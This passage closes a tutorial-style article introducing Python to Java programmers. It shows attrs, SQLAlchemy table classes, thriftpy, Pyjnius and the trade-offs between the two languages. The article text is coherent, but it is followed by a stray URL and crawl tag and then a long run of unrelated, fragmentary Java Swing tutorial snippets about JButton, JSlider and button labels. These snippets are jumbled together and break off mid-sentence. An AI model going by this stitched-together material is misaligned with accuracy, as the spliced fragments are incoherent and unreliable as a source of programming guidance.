Entire libraries have been built on these ideas. Do you hate the tedium of typing self.foo = foo for every attribute in constructors? And then defining equality and hashing and cloning and a dev-readable representation, all by hand? Java would need compiler support, which may be coming with Project Amber. Python is flexible enough that the community solved this problem with the attrs library. import attr @attr.s class Point: x = attr.ib() y = attr.ib() p = Point(3, 4) q = Point(x=3, y=4) p == q # True, which it wouldn't have been before! print(p) # Point(x=3, y=4) Or take SQLAlchemy, a featureful database library for Python. It includes an ORM inspired by Java’s Hibernate, but instead of declaring a table’s schema in a configuration file or via somewhat wordy annotations, you can write it directly and compactly as a class: class Order(Table): id = Column(Integer, primary_key=True) order_number = Column(Integer, index=True) status = Column(Enum('pending', 'complete'), default='pending') ... This is the same basic idea as Enum, but SQLAlchemy also uses the same hooks as property so you can modify column values naturally. order.order_number = 5 session.commit() Finally, classes themselves can be created at run time. It’s a little more niche, but thriftpy creates a whole module full of classes based on a Thrift definition file. In Java, you’d need code generation, which adds a whole new compilation step that can get out of sync. All of these examples rely on Python’s existing syntax but breathe new meaning into it. None of them do anything you couldn’t do in Java or any other language, but they cut down on structural repetition — which makes code easier to write, easier to read, and less bug-prone. Wrapping up Python has a lot of the same basic concepts as Java, but takes them in a very different direction and adds some entirely new ideas. Where Java focuses on stability and reliability, Python focuses on expressiveness and flexibility. It’s an entirely different way to think about imperative programming. I doubt Python will replace Java for you in the spaces where Java excels. Python probably won’t win any speed contests, for instance (but see PyPy, a JITted Python). Java has native support for threads, whereas the Python community largely shuns them. Very large complex software with a lot of dusty corners may prefer the sanity checking that static typing provides (but see mypy, a static type checker for Python). But perhaps Python will shine in spaces where Java doesn’t. Plenty of software doesn’t need to be particularly fast or parallel, and then other concerns float to the surface. I find it very quick and easy to get a project started in Python. With no separate compilation step, the write/run loop is much quicker. The code is shorter, which usually means it’s easier to understand. Trying out different architectural approaches feels cheaper. And sometimes it’s fun to just try out stupid ideas, like implementing goto with a library. I hope you’ll give Python a try. I have a lot of fun with it, and I think you will too. Just try not to treat it as Java with all the types hidden from you. Worst case, there’s always Pyjnius, which lets you do this. from jnius import autoclass System = autoclass('java.lang.System') System.out.println('Hello, world!')
https://www.sitepoint.com/python-for-java-people/
CC-MAIN-2022-27
refinedweb
4,744
64.41
DynDNS Drops Non-Delivery Reports 195 jetkins writes "In an email to subscribers, DynDNS announced that they will no longer deliver locally generated non-delivery reports (NDRs) from any MailHop systems. MailHop is a multi-faceted service offering in- and outbound relay services, spam and virus filtering, and store-and-forward buffering. DynDNS makes it clear that they are aware that this goes against RFC 2821 Section 3.7, but explains that in their opinion the increase in spam volume, and the use of NDRs as a spam vector, means that the value of NDRs is now far outweighed by their potential for harm. (DynDNS also points to the far greater reliability of email systems now than when the RFC was approved.) The company notes that other ISPs have quietly dropped RFC 2821-compliant NDRs. Will their public move start a flood (mutiny) of ISPs following suit? Should they have made efforts to have the standard changed instead of defying it?" Finally, a service provider with a clue... (Score:5, Informative) Re:Finally, a service provider with a clue... (Score:5, Informative) A properly-configured endpoint server should check addressee validity during the SMTP exchange, and reject the transfer before it even gets into the system, so the spammer's attempt goes nowhere and "Joe" doesn't get an unwarranted NDR. Of course that doesn't help proxy providers like DynDNS, unless they have some way of authenticating their clients' valid addresses in real time via a direct connection or regular updates. Re: (Score:2, Insightful) Re: (Score:3, Insightful) "If you think you can create a foolproof system, you are one of the fools" - No idea who I'm misquoting. Re: (Score:3, Insightful) We already moved from SMTP to ESMTP. Maybe we can go a step further, with, I don't know, ASMTP or whatever you want to call it. Then impose extra controls on messages that arrive via SMTP or ESMTP. In any case, there is absolutely nothing we can do about zombies, unless you want to implement some kind of "are y Re:Finally, a service provider with a clue... (Score:5, Interesting) Bunk. Even if it was true, it's still no excuse for ignoring your responsibilities. I run the mail servers for several domains, and brute-force attacks just don't happen. It's fairly obvious why, if you think about it. Dictionary attacks against common names are possible, but I've not seen evidence to suggest that's happening. Firstly, I want to get back to "responsibilities". By this I mean that anyone who's connected to the internet has a basic responsibility to make at least a good-faith attempt to prevent their system being used against other people. This goes doubly for people who intentionally run publically accessible servers (e.g. mail servers and web servers). You should treat any mail system which indiscriminately generates NDRs the same way you'd treat an open relay, because that's effectively what it is. You are deliberately making a server available which will accept mail from anyone on the internet, and send it to anyone else on the internet*. This is reckless irresponsibility. * - most NDR messages include at least part of the original message's text; at the very least, the subject line. So a system which generates backscatter does in fact carry some payload chosen by an anonymous third party. Even if brute-force attacks on your mail server's address list do occur, there are ways to mitigate the effects of it that don't turn your system into a spam engine. Having a look through the last 48 days logs on one of my servers, there's 2,308 addresses which were rejected because they're non-existent. The vast majority are either formerly valid addresses (i.e. of people who used to work here), or slightly mangled versions of valid addresses (presumably badly parsed). Particularly common are things starting with "3D" (presumably parsed from quoted-printable data which contains =3D) or people's surnames (smith@example.com) -- our email addresses are in the format firstname.lastname@example.com, and it would appear that some harvesters consider periods before the @ to be invalid. The second part highlights why brute-force is impractical: the namespace before the @ is absolutely massive, and only a tiny fraction will be valid addresses. If you have no idea what format email addresses in the target domain take, you have no choice but to try everything, and that will take far longer than a week. Add to this the proliferation of very small domains with only a handful of email addresses (i.e. personal domains, promotional domains). Even with a vast botnet, trying to harvest addresses by brute force against a mail server is so horribly inefficient as to not be worthwhile. There's much easier ways to harvest addresses. Then there's technical issues with that kind of harvesting. First, any reasonable mail server will start responding slower to a client which is making repeated errors, before finally shutting them off. This means you have to make lots of connections. Second, brute force or dictionary attacks stick out like a sore thumb versus normal mail traffic, making it trivial to block any IP which is trying to harvest addresses in this manner. The only possible way to do these sorts of attacks would be to use a vast distributed botnet, and even then it's not going to work. It would be easy (and fun) to build a system that watches for such attacks and blacklists any IP involved. Anyone harvesting in this way would then be betraying the IPs of most of their bots during the harvest! Then there's lots of clever things one can do: once you have a known harvester, start okaying its invalid addresses and add them to your list of spamtraps. Not only is the spammer not collecting any valid addresses, but you're poisoning their address list! Brute-force attacks are too easy to detect, and too easy to use against the attacker. There's much, much easier and more efficient ways to harvest email addresses. Possibly it could be used if you're targeting a specific company or domain and can do some research into their configuration, but even then there Re: (Score:3, Informative) Ignoring a problem isn't the same as fixing it... NDRs serve a useful purpose assuming the original message was actually useful. The problem isn't sending out NDRs. The problem is sending an NDR in response to spam! I've had to deal with the whole joe-job+NDR+DDOS scenario on several occasions... I have found that 65~80% of th Re: (Score:2) I'm certain you've seen the syndrome: Speak to the business owner and his management team about the problem in easy-to-understand terms, and their eyes glaze over Re: (Score:3, Interesting) What I'd like to see... (Score:2, Interesting) Re:What I'd like to see... (Score:5, Insightful) Re: (Score:3, Insightful) Re: (Score:2) In order to spoof a remote IP address you'd have to basically have to share a wire someplace between the mail server and your spoofing target, or exploit some secondary flaw on a router/host along that same path. It could be done, but there are easier ways to DoS, and most of those ways are effective beyond the single-host-to-single-mailhost-for-mail-service-on ly scope that is targeted with the attack y Re: (Score:2) That's a non-trivial attack though -- it's not as though you can send mail with uni-directional traffic. You don't have to send mail with unidirectional traffic. You just have to make sure that the traffic doesn't point back to you. In other words, if you send mail from a botnet, you're still free and clear as long as you don't use too much of your botnet at once. Re: (Score:2) I'm not suggesting you couldn't get some box other than your own desktop blocked, or that blocking by IP would be effective at stopping spam. I was just refuting the original statement that you could use IP-scoped blocking in r Re: (Score:3, Insightful) I wouldn't probably think to check a forum for an announcement on a free-shipping sale or a closeout on last year Re: (Score:2) I do that. (Score:2) After X failed addresses, block the sender. Except you have to make exceptions for things like gmail and hotmail and other major ISP's and mail delivery services. Instead of sending and NDR though, I just reject at SMTP time. If the ISP's were a bit smarter, they'd see X rejections (5xx-series) and shut down ALL outbound email from that account. And I want a pony and a plastic spaceship and RFC-Ignorant.org (Score:5, Interesting) Stupid bastards. Re: (Score:3, Insightful) Re: (Score:3, Insightful) Re: (Score:2) It's easier to get forgiveness than permission, I suppose. Re: (Score:2) Based on a 4-digit SlashID, I'd say not... Re: (Score:2) Re: (Score:3, Informative) Why are you accepting a message for a nonexistent user in the first place? As soon as the sending SMTP connection specifies RCPT you should be able to check if it is valid and terminate the connection if it is for a nonexistent user. This can all be done before the DATA command is issued. Why waste cycles virus scanning, spam screening and bouncing a message for a user you don't even have? You're not just RFC ignorant, you're ignorant of how to properly run a mail server! Note that the method above get Re: (Score:3, Insightful) Re: (Score:2) Possibly, but it does prevent the backflow DOS problem. Re: (Score:2, Informative) Re:RFC-Ignorant.org (Score:4, Insightful) So USE that information. (Score:5, Insightful) #1. The spammer already HAS the account name and is checking to see if it still works. Defeat this by generously distributing SpamTrap accounts. And accepting email to them. And then opt'ing out of the email that they receive. #2. The spammer is trying to guess a new name. Good luck with that. Sure, maybe SOMEWHERE there is an email account of "frank@example.com" but good luck finding it. If you want to have some FUN, watch your logs for examples of this. Then setup some of them as SpamTraps. And follow #1 above. I use both of these approaches. It makes filtering spam VERY easy. Re: (Score:3, Insightful) If someone is going to pull off a dictionary attack against the SMTP server, then you just discard connections to them after a specific number of invalid users. Almost all mainstream MUAs support this sort of thing now. At the end of the day, if you actually accept the message for delivery and later reject it, you should do so silently. Re: (Score:2) That works real well when the incoming e-mail is a complaint to sexual harassment anonymous hot line and the sender thinks the e-mail went through, but we silently dropped it due to a mistake on the spelling. I hate sending and e-mail and having no idea if it ever went through or not. So I setup all my outgoing e-mail to have delivery and read receipts to try and discover lost e-mail. Re: (Score:2) If the incomming e-mail is actually an anonymous complaint then there's no way to actually notify the sender in any event, is there? The best case would be the receiving MTA rejecting it immediately because it was mispelled, but if it doesn't, how do you expect it to talk to the original sender anyway Re: (Score:3, Informative) Re: (Score:3, Insightful) Re: (Score:3, Informative) Re: (Score:2) Many ISPs block 25 outbound to be good netizens and avoid their lusers'botnets spewing spam. Legit users can get the block lifted. Re: (Score:3, Insightful) Re: (Score:2) Re: (Score:2) Actually in this case it doesn't matter. If all email addresses @example.com are indeed mapped to your (valid) real email address, then foo@example.com IS valid, as far as the mail Re: (Score:2) Outright NDR ban is just plain stupid, akin to curing headaches with guillotine. If they must do something, why not place a cap and delay on the NDR traffic. Re: (Score:2) Yes Re: (Score:2) I'm not one of the people that shouts how "email Re: (Score:2) Probably The concept is nice, but I get scores of them every day from ignorant mailservers telling me that the spam that I didn't send, but had my address on it didn't get delivered. I filter them off into a folder, which frankly, I just purge every week or so. I don't have the time to read through them. Re: (Score:2) NDR ban sounds like a solution in search of a problem which will hurt legitimate users if this thing catches on. Re: (Score:2) Frankly, this article has me considering the possibility of refusing/blackholing NDRs on my own servers. I'm betting it might drop nuisance mail by as much as 5-10% Re: (Score:2) Re: (Score:2) Utterly retarded idea, and an utterly worthless list. Re: (Score:2) Change or Defy (Score:4, Insightful) If a RFC said all boxes should have a port that users could telnet into with root access, and people start abusing that would you leave it and wait for the standard to change? No (Score:2) Re: (Score:2) Re: (Score:2, Insightful) By "abbreviated," I mean mail servers should look at incoming apparent NDRs, drop most of the message content, and provide summary information instead. So instead of getting a fake NDR with a SPAM payload, you'd get something like "Your message addressed to fakeaddress@someplace.com, with subject beginning 'First three words,' could not be delive SPF? (Score. Re: (Score:2) Re: (Score:2) Granted, you can pick up alot from logs, but not all Re: (Score:2) Your email will go into a catchall mailbox and it will be forwarded to the appropriate person. Yes this is tedious however 1 missed email could be a missed chances at *TONS* of business. Often times people won't email you again if they get an NDR back. Re: (Score:2) If SPF were more widely implemented, or required to be implemented, wouldn't this problem be solved? Yes. Don't send NDRs to domains without SPFs or when SPF fails. A fair point.. Welcome to 2007. I hate to say it, but this is the state we're in. When I used mailhop, I used it for secondary MX, so I would not really have cared too much about the off chance that when my primary MX was down, you sent mail with typo in the To address. Failure recovery doesn't need to be 100% perfect for me to appreciate having it. I like SPF a lot... (Score:2) That said I DO wish more people would use it so that it's overall impact would be increased (as people began to rely on it more). TMDA aside (which has a whole batch of problems, I know) it's my next Re: (Score:2) "If I typo an email address, I damn well better be getting an NDR from the recipient domain," And if your typo matches a real person's email, you won't be getting an NDR. Heck, I've gotten tons of email from people who have sent their stuff to the wrong person - including the new password for someone whose name misses mine by one letter. If the mistake originated with you, don't expect someone else to take responsibility for fixing it. Re: (Score:2) No, SPF/Sender-ID are bad ideas, which even their creators don't put much trust into. Don't believe me? Try sending a brand-new newsletter to Hotmail and MSN subscribers. Make sure all your Sender-ID and SPF records are in place and verified with Microsoft's own Sender-ID checker. Make sure all your WHOIS data is current, valid and not obfuscated for privacy. Setup your mail servers on freshly-allocated Re: (Score. Which is why you run a real secondary MX that can either do recipient callout or use valid recipient lists in order to reject during SMTP. DynDNS is a che to defy the laws of tradition (Score:5, Insightful) maybe by defying it, the standards will now be reviewed, and eventually changed. Re: (Score:2) And your daily lesson in passive aggression comes to you from chef_raekwon today. Not very Wu of him, if you ask me. Re: (Score:2) RFC (Score:2, Funny) Re: (Score:2) The Problem Is Not NDR's (Score:5, Insightful) The main problem is a you have a system based on blind trust. Second trust based duct-tape systems are simply too cumbersome for the average user. I don't have the answer but I do know that email in it's present state is broken. Start at the top, with secure DNS. (Score:2) Re: (Score:3, Informative) Way to confuse envelope-from, header-from and reply-to. Besides, my home-brewed Linux-based mail server has a published SPF record, and anyone receiving mail can verify that machine is entitled to generate envelope-from with that domain. The SPF also spells out my relay provider, since my DSL line is in DSL blocklists. What it really needs, at the least, is for people to stop accepting bogus HELO/EHLO addresses and other unverifiable envelope information. If there isn't even an A record for the HELO ad Re: (Score:2) Re: (Score:2) I'm reposting this to make certain that if one point gets made here, this is it. Re: (Score:2) E-mail works fine, with the various hacks that have been added on to fight entropy. Dealing with normal spam is no worse than the annoyances of closed networks - you still get spam on facebook etc! Compare and contrast e-mail with the alternatives - you get instant messaging, which solves a different problem and *still* sucks, or you place yourself at the mercy of a third party. No thanks. If you can't use e-mail chances are you don't: Run an well configured server (or pay an insignific Re: (Score:2) Re: (Score:2) I have an answer (Score:3, Insightful) Yeah, whiners on Slashdot say CAN-SPAM is horrible, because it legalizes spam. What they forget is that CAN-SPAM only legalizes it under certain rules, which spammers are ignoring because there's no enforcement. According to this article from last year [techweb.com], only 0.27% of all junk mail actually complies with CAN-SPAM, which means the other 99.73% is clearly illegal. On top of that, the 0.27% is deliberately easy to filter out i Re: (Score:2) Then if for whatever reason it has to be email, rather than courier, fax, snail mail, in person, etc, you could always pick up the phone and ask for verbal confirmation of receipt, or assume that not getting a reply confirming receipt is evidence of non-delivery. Anyone who blindly relies on email (or anything else) being delivered, received, understood and acted upon correctly for a critical business venture without some kind of conf Re: (Score:2) Standards and Implementation (Score:5, Insightful) Going against standards can cause a bit of chaos as well, which is why it's good to avoid deviation - but sometimes a deviation makes sense, and you do it. Publicly announcing this (non-critical) deviation, and explaining exactly why, is the proper way to go about it. Re: (Score:3, Insightful) The process of modifying standards is a bit more complex [rfc-editor.org] than that, but there is a process for change. You just have to become part of it rather than just picking and choosing which standards annoy you the least and then hoping that someone else will fix the ones that don't work the way you think they should. Re: (Score:2) I tend to differ... What they're doing is making a change to a service that they provide so that their problem is resolved (which they have a right to do IMO). It's kind of a move towards an 'ignorance-is-bliss' policy rather than fixing a problem for their customers... after all, if they aren't aware of a spam problem that their customers are experiencing then there isn't a spam problem. I'm a f Turn off original message in the bounce??? (Score:3, Interesting) This is how it goes on all our mail servers. All bounced messages have the original content stripped off. You get the error message with the reason the message bounced and that's it. NDR are still usefull. There is PLENTY of mail servers not configured properly or messed up on the Net, even from big ISPs. Calling the current system as a whole, reliable, is a joke. Re: (Score:2) Basically, our spam law says it's illegal to send unsolicited commercial e-mails to private individuals - there's nothing to say that you have to be the author of the spam to fall foul of that law, you are still guilty if you send me an unsolicited commercial e-mail by bouncing it to me from a third party when I'm being joe-jobbed. A nicely worded 'please change your settings, or I'll tell the information commissioner to fine you £5,000 per m Re: (Score:2) NO. Once a spam MO becomes commonplace, that technique will NEVER go away. You seem to be implying that if the "effort" is wasted in vain, then spammers will deprecate their old technique. They won't - they'll just ADD new techniques. The NDR loophole will never die. Long deprecated in practice (Score:2) not all sending servers can generate NDR (Score:2) sendmail and postfix both do this. don't know about MS exchange or courrier. a default qmail install (without patches) certainly don't. i believe there's a patch to implement this Are DynDNS cluebies? (Score:5, Insightful) Excuse me, but due to the vast amount of spam handling, modern e-mail systems are substantially less reliable than they used to be. If you redirect email for your domain name to Hotmail, chances are good that it will disappear without a trace. (No NDR, not in the spam box either.) Someone else already mentioned the problem of people typoing email addresses. This is a common problem. Email can be bounced for other reasons, too, such as a full mailbox, or that there is a relaying mail server (yes, DynDNS, they still exist, and in abundance!) which gives up on delivery after a week of timeouts for the destination host. And so on. Someone at DynDNS needs a good whack with the clue bat. Re: (Score:2) If you have a DynDNS account, chances are good that you don't forward all your e-mail to a HotMail [live.com] account. In fact, you might run your own mailserver; in that case, you can make sure that your own server returns whatever bounce messages you feel are appropriate. Even the forwarding service will normally be pointed at RFC-compliant servers, which may c Problem is legitimate, solution is not (Score:2, Interesting) First, by their own admission this is only a serious problem for what they call their MailHop Backup MX service. Their other services, MailHop relay and forward are "mostly immune" to DSN issues. T Re: (Score:2, Insightful) Not necessarily. Backup MX services could do address validation if they're given a userlist. Of course, this entails some security concerns (example: why trust a backup service with a userlist?), but that can be figured out satisfactorily (answer: use a backup service you can trust, and engineer a secure solution). Further thoughts: There is little reason to avoid address validation these days. As for the argument against address validation -- Bad idea (Score:2) Unilaterally deciding to ignore an RFC (or part of an RFC) just because you don't like it is almost never a good idea. When Microsoft does it, everyone (correctly!) gets up in arms. DynDNS shouldn't get off any easier. At most, I would agree with a temporary block of NDRs to a particular user or domain if a large joe-job run is recognized. But this should never be made permanent or blanket. Having read TFA... (Score:2) The problem is one of architecture. There is no excuse in the modern world for running a secondary MX server that lacks knowledge about local recipient addresses. While this architecture may have been OK 10 years ago, it no longer is. Just don't run a secondary MX unless you have a way to transfer your account list to the secondary in a way that the secondary can have local knowledge of valid addresses even if the primary is unreachable. NDR's are not evil (Score:5, Insightful) The problem is not with NDRs. The problem is that their servers *accepted* the message that eventually had to be NDR'd in the first place, then after accepting responsibility, decided they didn't want that responsibility, so discarded mail that they promised they would deliver. If their servers checked validity of local recipients, scanned and filtered the message, etc BEFORE accepting it (via 2xx series SMTP accept response), and instead properly REJECTED it with a 5xx series response, these messages would never be bounced. The NDR mechanism is not at fault - rather, the fact that they can't properly configure their servers to reject the message up front is at fault. If you properly REJECT the messages at the SMTP level instead of accepting the message for delivery, the only thing left to NDR are perfectly valid cases, such as mailbox over quota, etc. Once you *accept* responsibility to deliver a message (via a 2xx series SMTP response), you MUST deliver it somewhere, else you have shirked your responsibility - either deliver it to it's destination, or bounce it. To do anything else would be to LOSE mail, which is the ultimate sin of any mail server. The key is not to throw out bounce messages, but to minimize or eliminate unnecessary bounces in the first place by rejecting instead. Note that by properly REJECTING the message, you also effectively defeat most spam bots, since they can't "bounce" the mail that you reject to the "real" local sender. I always hate it when providers like this take the short cut of *losing* mail intentionally rather than fixing their broken systems to work right. One caveat to my comments - unfortunately, some mail software is symply not geared toward todays Internet, such that it can do the scanning and filtering of messages realtime fast enough to prevent a sending server from timing out while it's doing this scanning, so they queue the mail to process it for spam, etc later. Using such software is the first mistake most places make, and is the real reason why there are so many NDR's in the first place. Re: (Score:3, Insightful) A similar problem occurs when you submit outbound mail to your ISP -- unless it's going to someone else at the same ISP, the local SMTP server can't verify that delivery will succeed. At the ISP level it's still probably reasonable to generate bounce message, at least for local users. That way you don't have to do the final delivery right away, users can still get error messages, and you don't risk sending If email is so reliable these days... (Score:2) Re: (Score:2) Re: (Score:2) Re: (Score:2) High-availability systems generally accept degraded performance in a double-fault situation. Really, email only needs to rise to the level of "high-availability" (as opposed to "fault-tolerant"), given users' current expectations. If you need anything better than that, users generally rely on "layer 8" (human) acknowledgment (largely b Good for DynDNS; TZO.COM did this 3 months ago (Score:2) This step might not have been necessary if everyone customized (read: FIXED) their Microsoft Exchange installations, but that's never going to happen. TZO stated that 80% of outbound relayed mail was DSN from spammer attempts. With a lot of Exchange installs, even if that server is NOT an "open relay", they WILL send out DSN's for spam relay attempts. NO mail server should send out DSNs for domains that are not their own - just reject it up front. Unfortunately tha POTS (Score:2, Insightful)
https://tech.slashdot.org/story/07/08/24/1931224/dyndns-drops-non-delivery-reports
CC-MAIN-2016-30
refinedweb
4,849
69.72
#include <lqr.h> The first one must only be used on the LqrCarver objects created with lqr_carver_new, i.e. with 8-bit images, while the second one is general, but the rgb pointer must be cast to the appropriate type to be used (i.e pass the address of a pointer to void to the function lqr_carver_scan_line_ext, then cast it to a pointer of the appropriate type and use this last one for reading the output). Use the function lqr_carver_scan_by_row(3) before calling these to know whether your image will be scanned by row or by column. These functions return TRUE in case the readout is successful and the end of the image was not reached, FALSE otherwise. If lqr_carver_scan_line is called over a non-8-bit LqrCarver object, it will return FALSE. LqrColDepth(3), lqr_carver_scan_reset(3), lqr_carver_scan(3), lqr_carver_scan_by_row(3)
http://www.makelinux.net/man/3/L/lqr_carver_scan_line_ext
CC-MAIN-2014-52
refinedweb
141
61.06
MediaWiki User Guide/Print version This is a user guide to MediaWiki, the software that runs Wikipedia, Wikibooks andother Wikimedia projects. The book focuses on Mediawiki markup. Topics out of scope of the book include administration and development of Mediawiki. Contents - 1 Text Formatting - 2 Hyperlinks - 3 Sections and Headings - 4 Lists - 5 Tables - 6 Images - 7 Categories - 8 Templates - 9 References - 10 Mathematics - 11 Namespaces - 12 Glossary Text Formatting Text formatting can also be done using HTML and CSS. Some of the most useful HTML elements are: Some HTML elements are not allowed, such as A and IMG. Source code> Hyperlinks There are two types of hyperlinks in MediaWiki: internal, also called wikilinks, and external. Internal hyperlinks External hyperlinks Redirecting. Sections and Headings Headings are created using sequences of "=" characters, placed before the heading title and after the heading title, on the same line. The level of headings is determined by the number of "=" characters. Examples: Start level: 2 Do not use headings of level 1, such as "=Title="; start with level 2 instead. The heading at level 1 is used for the title of the page. Maximum level: 6 Depending on the convention that users and editors adopt, there can be any number of spaces between the "=" characters and the title. An example without spaces: ==Plants== An example with spaces: == Plants == Table of contents There is no simple way to make a heading not appear in the table of contents. For a complex way requiring the adjustment of the MediaWiki software, see Meta:Help:Section. Customizing TOC There are various ways how to customize the table of contents. For instance, to place it to the right, use: <div style="float:right; clear:both; margin-left:0.5em;">__TOC__</div> Editability of sections. Lists Lists formatting: Bullet lists: Numbered lists: Definition lists: Mixed lists: Lists inside tables: Tables Tables: {| |+ Caption of the table ! Heading 1 ! Heading 2 |- | Cell 1 in row 1 | Cell 2 in row 1 |- | Cell 1 in row 2 | Cell 2 in row 2 |} Dense format: {| |+ Caption of the table ! Heading 1 ! Heading 2 |- | Cell 1 in row 1 || Cell 2 in row 1 |- | Cell 1 in row 2 || Cell 2 in row 2 |} Lists in tables: {| ! Heading a ! Heading b |- | * a1 * a2 | |} Images Mediawiki supports the use of images in various formats. In order to be used in a wiki, image first needs to be uploaded, to which we come later. Placing images The following is an overview of placing images into pages, such images that have already been uploaded. Location: - 'right' - 'left' - 'center' - 'none' Galleries Images can be put into a gallery as follows. Notice the absent "[[" and "]]" around the names of the image files. <gallery> Image:name_1.png Image:name_2.jpeg </gallery> Images in galleris can be given captions, as follows. <gallery> Image:name_1.png | Caption 1. Image:name_2.jpeg | Caption 2. </gallery> Uploading images A wikilink to a category needs to start with ":", such as See also [[:Category:Birds]] Otherwise, the page is put into the category instead of linking to it, and the wikilink is not shown. Templates}}". Parameters Control structures such as if and switch are available, if the ParserFunctions extension of MediaWiki is installed. Transcluding any page/> Mathematics To get started, follow the examples below. Greek and symbols There is a way of marking up Greek characters and special symbols, as the following table shows. Namespaces. Glossary This is a glossary of the book. C - category - TODO N - namespace - The part of the name of the page before the first ":". P - piped link - An internal link or interwiki link where the link target and link label are both specified. W - wikilink - An internal link; a link pointing to another page of the same wiki or knowledge base, marked up using [[target word]], contrasting to links to other web sites. - wikitext - Text containing wiki markup, such as '''text''' for boldface.
https://en.m.wikibooks.org/wiki/MediaWiki_User_Guide/Print_version
CC-MAIN-2020-05
refinedweb
650
54.22
When I #include the Blynk libraries from more than 1 module, I get multiple definitions at compile time. How can I get the Blynk declarations into a second or third module, without multiple definitions? [SOLVED] Multiple #include across IDE tabs causing multiple definition errors Blynk multiple definitions Arduino IDE, PlatformIO, Tabs and other programming options Cant call Blynk from a class file What do you mean by module?? You should only need to declare Blynk once based on your device/connection type. e.g. #include <BlynkSimpleStream.h> // for USB #include <BlynkSimpleEsp8266.h> // for ESP #include <BlynkSimpleEthernet.h> // for Ethernet But NOT more than one at a time. A module (in software) is a. cpp or other language code-file possibly paired with a definitions file (.h). My project is large enough that I’ve divided it into several modules. The .ino file is the main program with various related functions grouped into their own files. Each of them gets compiled by itself, then they are linked together into the complete hex file that gets uploaded to the Arduino. It is the linking process that draws the error message; it finds two objects with the same name where there should only be one. Well, I can’t say that I am completely following you on the separate “module” explanation… is that similar to multiple tabs in the IDE? Either way, it is probably beyond my current programming knowledge. Can you provide more details… and you may have to show the code for others to grasp what you are trying. When posting code, please format it as shown here. Yes, when there is more than one file in a project, each one is shown in a separate tab. In my project, the .ino file’s ‘loop()’ function looks like void loop(void) { Timer.run(); // update timers Fsm.run(); // dispatch events Blynk.run(); // update Blynk } , plus it opens the connection to the Blynk server. Another module (file) needs to call Blynk to update a variables it manages: static SMRESULT_T afUpdTemps(SMEVENT_T event) { char fxbuf[9+1]; q12p4toa(fxbuf, TemprSm[0]); // conv value to string Blynk.virtualWrite(VTemp1, fxbuf); send to Blynk return( Success ); } The trouble comes when two files both try to #include <BlynkSimpleShieldEsp8266.h> The declarations in the #included .h file are needed in each source file to compile that its references to the Blynk Library, but it appears that the included file(s) also define a Blynk instance, leading to the multiple definitions. If that is the correct interpretation, the library should let the project define the Blynk instance(s) it needs. OK, I have adjusted your title to better reflect the issue. There are some good programmers out there who might know what to do. I think in Arduino the Tabs option is a really dumb implementation from their side. It just concatenates all files. You can use the IFDEF statement I think to check if a module is already defined or included. I’ve updated post #3 to go into more detail and tweaked the title. I’m not looking for a work-around for this; I already have that. I’m hoping the library will get fixed to prevent the issue in future. I probably should have posted this in Issues and Errors - my bad. For future readers: One work-around is to assign one, and only one, of the modules as the Blynk interface. Only that module #includes the Blynk library or libraries you need, and it contains the only functions that directly talk or listen to Blynk, including helper-functions that you write specifically to communicate with Blynk on behalf of code in your other modules. It is awkward, because you lose some of the flexibility inherent in the design of Blynk’s library entries, unless you re-invent it your helper functions. It all ends up on the same forum… but this doesn’t sound like a Blynk specific issue. Do all other libraries allow multiple repeat #includes across tabs without the IFDEF option as @Lichtsignaal suggested? it is not dumb, if you know how it works and what it does (indeed, it just concatenates all files, in a specific order). i use it all the time if a project is larger than 1-2 pages. personally, i have a: - main file (global variables, object inits, main loop comes here) - a “header” file (here goes all the includes and defines) - than separate file for every function (even for void setup) i simply can not imagine how to handle a larger project without tabs in arduino ide… with tabs, one can organize the code really well, and results much cleaner interface. of course, you can not compare the arduino ide with jetbrain ides, but until someone will came up with a usable + easily configurable + smart ide for arduino, this is the best we can use. for some time i used clion with arduino plugin, but never worked flawlessly, and it was a pain in the ass to set it up… @wanek Good reference article Barely a few paragraphs in and I already found mention of this OP issue: Essentially, you should only keep all variable definitions, setup() and loop() in your main .pde file, and disperse all your functions into their separate .pde files… personally for me, that article was one of the biggest help in code organisation with arduino ide in larger projects. it is strange in the beginning, but after you got used to, it is gold. 5 posts were split to a new topic: Arduino IDE, PlatformIO and other programming options @JRobert I have tested the Arduino IDE multi-tab setup with my large Arduino Mega 2560 Blynk Testbed Project (24.3KB and 8 tabs full of various Blynkified sensors, relay, servo and LED functions - and growing ). No “workarounds” required. I just simply cut and pasted any standard loops and Blynk Function loops into their associated tabs. All #defines, setup() and void loop() stay in the primary tab. Aside from minimising the vertical scrolling necessary to move through my sketch, everything works normally and compiles fine. No changes required to how I programed anything. So basically, as long as you are using the IDE tabs correctly and DON’T duplicate any of your #defines, variable declarations, etc. across the tabs (there should be absolutely no need to anyhow), you will be fine. When I work in the IDE (which is not often) I create a Tab for every function I make. This makes things pretty much neat and orderly. All the setup and run-once stuff I put in the main INO file. I usually add a last Tab with a text file used for documentation called zz_Documentation.ino or something, so it ends up in the back I appreciate everyone’s willingness to help, and you’ve found some useful guidelines for creating multi-file projects. However those do not address the issue I raised and it is not yet solved. Will whomever marked it so please un-mark it. I have submitted a full issue report on GitHub (Issue #312), including a minimum, complete, and verifiable example, and an analysis of what I believe causes it. Multiple definition errors when including WidgetTimeInput.h in separate class I "fixed’ your example the correct multi-tabbed way and posted it back on Github. Compiles just fine now. PS, delete that BlynkDemoMod1.cpp file before you open the rest into the IDE or you will be right back where you started. If you open the .ino file in the IDE without deleting that .cpp file, then delete it after the fact, you will have to close and reopen the IDE before the rest will compile.
https://community.blynk.cc/t/solved-multiple-include-across-ide-tabs-causing-multiple-definition-errors/13702
CC-MAIN-2019-04
refinedweb
1,281
71.65
Changing Java Swing : JButton Example Java Swing : JButton Example In this section we will discuss how to create button by using JButton in swing framework. JButton : JButton Class extends... Exception{ JFrame f = new JFrame("JButton Example"); f.setLayout(new FlowLayout.  JSlider Component of Java Swing JSlider Component of Java Swing  ... component of Java Swing. A Slider is a Swing tool which you can use for selecting.... In this program, events on the JSlider component have also been shown. If you increase | Show Input Dialog Box | Changing the Label of a JButton Component | Multi line Label for a JButton Component | Adding an Icon to a JButton... Component Java Swing Tutorial Section - II Limiting Values in Number Java Swing : JLabel Example In this tutorial, you will learn how to create a label in java swing Jbutton[] background & foregroundcolor change Jbutton[] background & foregroundcolor change how to change the color of the selected JButton in java swing. I am create JButton in an array JButton button[]=new JButton[100]; if i select button[5] then the Jbutton Setting Multi-Line label on the Button label on the button in Java Swing Applications. This program uses html class from javax.swing.text.html*; package and then breaks the text label... Setting Multi-Line label on the Button   Java JButton Key Binding Example Java JButton Key Binding Example In this section we will discuss about how... and the corresponding keystroke is 